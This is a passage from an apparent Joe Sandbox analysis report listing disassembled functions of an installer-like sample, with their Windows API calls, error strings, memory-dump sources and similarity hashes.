                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 344208780-3482516102
                                                                                                                                                              • Opcode ID: cfa9b8d12e22214b0de78ab19a0257202e3b0e3b29a75cf1f61b9d7c2f99075c
                                                                                                                                                              • Instruction ID: 881cc776e2b3f4123cb221384eecb38dc26d9d0a9586e0b2c27b37a456375fff
                                                                                                                                                              • Opcode Fuzzy Hash: cfa9b8d12e22214b0de78ab19a0257202e3b0e3b29a75cf1f61b9d7c2f99075c
                                                                                                                                                              • Instruction Fuzzy Hash: B8F0B435241618EBC7731E44AC08E5B77ACFB52B60F21411AFC04DB350C775DE5096E4
                                                                                                                                                              Function 007DF2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 007DF2EE
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DF2F8
                                                                                                                                                              Strings
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DF31C
                                                                                                                                                              • Failed to post plan message., xrefs: 007DF326
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessagePostThread
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                                                              • API String ID: 2609174426-2952114608
                                                                                                                                                              • Opcode ID: 7cb309da2f403b986feeeada1cb3be965484a31c366fdc71b1d24ff733b11ed8
                                                                                                                                                              • Instruction ID: 15f2113f03197ba4e5105cf8d7e0b3a619d7cefeb73856c367cb663be8a1fada
                                                                                                                                                              • Opcode Fuzzy Hash: 7cb309da2f403b986feeeada1cb3be965484a31c366fdc71b1d24ff733b11ed8
                                                                                                                                                              • Instruction Fuzzy Hash: 40F0A7336416316BD6312A95AC0AE8B7FD8FF04B70B024025FD54EB391D669DC0085E5
                                                                                                                                                              Function 007DF3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 007DF3FC
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DF406
                                                                                                                                                              Strings
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DF42A
                                                                                                                                                              • Failed to post shutdown message., xrefs: 007DF434
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessagePostThread
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                              • API String ID: 2609174426-188808143
                                                                                                                                                              • Opcode ID: c42d218928711e2500d4c12eda2ff99563ea6af7d27b9fd19b918f4b06cd42a0
                                                                                                                                                              • Instruction ID: c3e4b46983ebfc7b16d7d27e3655981487aa8548c1d7257066f6611025ab2aed
                                                                                                                                                              • Opcode Fuzzy Hash: c42d218928711e2500d4c12eda2ff99563ea6af7d27b9fd19b918f4b06cd42a0
                                                                                                                                                              • Instruction Fuzzy Hash: B2F03737A4163577D6315695AC0EF877BA8FF04B60B124036FE14FB392E659DC0086E5
                                                                                                                                                              Function 007E07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(0080B478,00000000,?,007E1717,?,00000000,?,007CC287,?,007C5405,?,007D75A5,?,?,007C5405,?), ref: 007E07BF
                                                                                                                                                              • GetLastError.KERNEL32(?,007E1717,?,00000000,?,007CC287,?,007C5405,?,007D75A5,?,?,007C5405,?,007C5445,00000001), ref: 007E07C9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set begin operation event., xrefs: 007E07F7
                                                                                                                                                              • cabextract.cpp, xrefs: 007E07ED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorEventLast
                                                                                                                                                              • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                              • API String ID: 3848097054-4159625223
                                                                                                                                                              • Opcode ID: 959ce6e4eab3f04477043943611345e7ad76ffe6e85efec6fdba8984aa0dc088
                                                                                                                                                              • Instruction ID: f0f40fcde6456739278b2dc595f7489dd45424a50c74e429067aa845e8577210
                                                                                                                                                              • Opcode Fuzzy Hash: 959ce6e4eab3f04477043943611345e7ad76ffe6e85efec6fdba8984aa0dc088
                                                                                                                                                              • Instruction Fuzzy Hash: C8F0EC3754367167D62112965D0AB8F77C8FF09B71B114129FE01FB340E66CAC80C6E5
                                                                                                                                                              Function 007DEBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 007DEBE0
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DEBEA
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to post apply message., xrefs: 007DEC18
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DEC0E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessagePostThread
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                              • API String ID: 2609174426-1304321051
                                                                                                                                                              • Opcode ID: 69b23863bd931c7aef08c0a0e7e42fd6023211d1dc7d0cb4a14b5c04c4d05160
                                                                                                                                                              • Instruction ID: ed2fee91d6b2790bd5df6d268765e4706e6b4e25ed298d9483845c1353904199
                                                                                                                                                              • Opcode Fuzzy Hash: 69b23863bd931c7aef08c0a0e7e42fd6023211d1dc7d0cb4a14b5c04c4d05160
                                                                                                                                                              • Instruction Fuzzy Hash: D5F01233A5163567D63226959C0DE8BBE98FF04B70B024015FE18FE391D669980096E5
                                                                                                                                                              Function 007DEC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 007DEC71
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DEC7B
                                                                                                                                                              Strings
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DEC9F
                                                                                                                                                              • Failed to post detect message., xrefs: 007DECA9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessagePostThread
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                              • API String ID: 2609174426-598219917
                                                                                                                                                              • Opcode ID: 4b04f5fba4bf0bd649ce880878990ea1ac45e79fe3c2b3c5d7b682d81c4de3a0
                                                                                                                                                              • Instruction ID: 10296f5455e623de4ae0d99c11f3e3bc38a482daad0f6f414629232a49708b5e
                                                                                                                                                              • Opcode Fuzzy Hash: 4b04f5fba4bf0bd649ce880878990ea1ac45e79fe3c2b3c5d7b682d81c4de3a0
                                                                                                                                                              • Instruction Fuzzy Hash: 89F0A73365123167D6316695AC09F877FA8FF04B71B124015BD5CEE381E669DC00C5E4
                                                                                                                                                              Function 007F6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                              • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                              • Instruction ID: c55b02849e01bff947777c3dbf2d23cad13df3c29a829d6b68f46228a84e743b
                                                                                                                                                              • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                              • Instruction Fuzzy Hash: 5AA13576A0078A9FDB218F28C8817BEBBA5FF15310F1441ADE6959B382D63C9D41C761
                                                                                                                                                              Function 00805EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                              • String ID: dlutil.cpp
                                                                                                                                                              • API String ID: 1659193697-2067379296
                                                                                                                                                              • Opcode ID: 70f976240f339c7688e0cf9b1fed9b634d130e17fd13fc20e5da12a62e6424ff
                                                                                                                                                              • Instruction ID: b435e429b8aa1b903716982c318b25f1790af98fc8a9670865c2c54fa794f424
                                                                                                                                                              • Opcode Fuzzy Hash: 70f976240f339c7688e0cf9b1fed9b634d130e17fd13fc20e5da12a62e6424ff
                                                                                                                                                              • Instruction Fuzzy Hash: A751907290162AEBDB219FA58C849AFBBB9FF88710F154114FD00F7290DB75DD518BA0
                                                                                                                                                              Function 007F922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,007F2444,00000000,00000000,007F3479,?,007F3479,?,00000001,007F2444,ECE85006,00000001,007F3479,007F3479), ref: 007F9278
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007F9301
                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007F9313
                                                                                                                                                              • __freea.LIBCMT ref: 007F931C
                                                                                                                                                                • Part of subcall function 007F521A: HeapAlloc.KERNEL32(00000000,?,?,?,007F1F87,?,0000015D,?,?,?,?,007F33E0,000000FF,00000000,?,?), ref: 007F524C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 573072132-0
                                                                                                                                                              • Opcode ID: f1bbe16b1c1403778e913b235738323dfb78927efadf9ddd084b11800a61fa2b
                                                                                                                                                              • Instruction ID: 95e840ba23279a248b6da7f9471f9cb12f000aeba7b7b36f887e419e509acbc2
                                                                                                                                                              • Opcode Fuzzy Hash: f1bbe16b1c1403778e913b235738323dfb78927efadf9ddd084b11800a61fa2b
                                                                                                                                                              • Instruction Fuzzy Hash: 1631AD32A0020AEBDB249F64CC85EBE7BA5EF40310F044128FE04D7291EB39CD91CB90
                                                                                                                                                              Function 007C4FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,?,007C5552,?,?,?,?,?,?), ref: 007C4FFE
                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,007C5552,?,?,?,?,?,?), ref: 007C5012
                                                                                                                                                              • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007C5552,?,?), ref: 007C5101
                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007C5552,?,?), ref: 007C5108
                                                                                                                                                                • Part of subcall function 007C1161: LocalFree.KERNEL32(?,?,007C4FBB,?,00000000,?,007C5552,?,?,?,?,?,?), ref: 007C116B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3671900028-0
                                                                                                                                                              • Opcode ID: a516008c6d87364c9a456b70076a4b523d4247d8311f10418b714fc9bb5c7dab
                                                                                                                                                              • Instruction ID: 0d5c6338a114fa1ac20df0979e20294b9050bf2ede240b2e3a52feed7d5154fa
                                                                                                                                                              • Opcode Fuzzy Hash: a516008c6d87364c9a456b70076a4b523d4247d8311f10418b714fc9bb5c7dab
                                                                                                                                                              • Instruction Fuzzy Hash: 1341AA71500B05ABDA71EBB4C88EF9B73ECAF05340F44092DB6AAD3051EB39F5858B65
                                                                                                                                                              Function 007C4C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007CF96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,007C4CA5,?,?,00000001), ref: 007CF9BC
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 007C4D0C
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 007C4CF6
                                                                                                                                                              • Failed to get current process path., xrefs: 007C4CCA
                                                                                                                                                              • Unable to get resume command line from the registry, xrefs: 007C4CAB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$Handle
                                                                                                                                                              • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                                                              • API String ID: 187904097-642631345
                                                                                                                                                              • Opcode ID: e0f2288688d9ddca5e40584c403ed82fef55d6484e9864056b53c1d9fd0e752d
                                                                                                                                                              • Instruction ID: 1ce6ab6fecbf513f550920714110ee6879f37806b3d06b995c429f223dd78dd7
                                                                                                                                                              • Opcode Fuzzy Hash: e0f2288688d9ddca5e40584c403ed82fef55d6484e9864056b53c1d9fd0e752d
                                                                                                                                                              • Instruction Fuzzy Hash: EF116D71D01518BACF22AB98DC16E9EBBB8FF50721B10419EF911E2250DB358E10AA91
                                                                                                                                                              Function 007F88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007F8A56,00000000,00000000,?,007F8859,007F8A56,00000000,00000000,00000000,?,007F8A56,00000006,FlsSetValue), ref: 007F88E4
                                                                                                                                                              • GetLastError.KERNEL32(?,007F8859,007F8A56,00000000,00000000,00000000,?,007F8A56,00000006,FlsSetValue,00822404,0082240C,00000000,00000364,?,007F6230), ref: 007F88F0
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007F8859,007F8A56,00000000,00000000,00000000,?,007F8A56,00000006,FlsSetValue,00822404,0082240C,00000000), ref: 007F88FE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                              • Opcode ID: ba587f30769088c57eccb5296c5f29d2a5cd77e7cacd9c230d320942d13d66fd
                                                                                                                                                              • Instruction ID: 6484c44963a09af80f52a609124aaf02cab1b81c51eae38c652aa2249d827ab8
                                                                                                                                                              • Opcode Fuzzy Hash: ba587f30769088c57eccb5296c5f29d2a5cd77e7cacd9c230d320942d13d66fd
                                                                                                                                                              • Instruction Fuzzy Hash: 0301D43274122AABCB618B699C44A7B7798FF15BA17210620FA16E3340DB64EC0187E2
                                                                                                                                                              Function 007F615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,007F1AEC,00000000,80004004,?,007F1DF0,00000000,80004004,00000000,00000000), ref: 007F6162
                                                                                                                                                              • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 007F61CA
                                                                                                                                                              • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 007F61D6
                                                                                                                                                              • _abort.LIBCMT ref: 007F61DC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 88804580-0
                                                                                                                                                              • Opcode ID: 62989ef33f92bb6866c6b7cd4a298bad9442596ac89606089264d8a9debd5ba5
                                                                                                                                                              • Instruction ID: 10250caf3256716d53524d25e64dec97ff4cc2ddd1623804d82ebb8d8c407c70
                                                                                                                                                              • Opcode Fuzzy Hash: 62989ef33f92bb6866c6b7cd4a298bad9442596ac89606089264d8a9debd5ba5
                                                                                                                                                              • Instruction Fuzzy Hash: 3FF0C836104E1DE7C2223335AC0EB3F275AAFC1771B250125FB1496393FF2C98024122
                                                                                                                                                              Function 007C7435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007C7441
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 007C74A8
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get value as numeric for variable: %ls, xrefs: 007C7497
                                                                                                                                                              • Failed to get value of variable: %ls, xrefs: 007C747B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                              • API String ID: 3168844106-4270472870
                                                                                                                                                              • Opcode ID: 5bbc3e09601db27a2827090e4c18c1ea6371c4fa58a17d15e85241b6e28596a6
                                                                                                                                                              • Instruction ID: f927198871a16caf2115bb63347db55ec62c3ab6c25808095f6a93a0d4553438
                                                                                                                                                              • Opcode Fuzzy Hash: 5bbc3e09601db27a2827090e4c18c1ea6371c4fa58a17d15e85241b6e28596a6
                                                                                                                                                              • Instruction Fuzzy Hash: 20012972945168EBCB195F54CC09F9A7F64AF04761F008169FC04A6261CB3A9E50AA94
                                                                                                                                                              Function 007C75AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007C75B6
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 007C761D
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get value of variable: %ls, xrefs: 007C75F0
                                                                                                                                                              • Failed to get value as version for variable: %ls, xrefs: 007C760C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
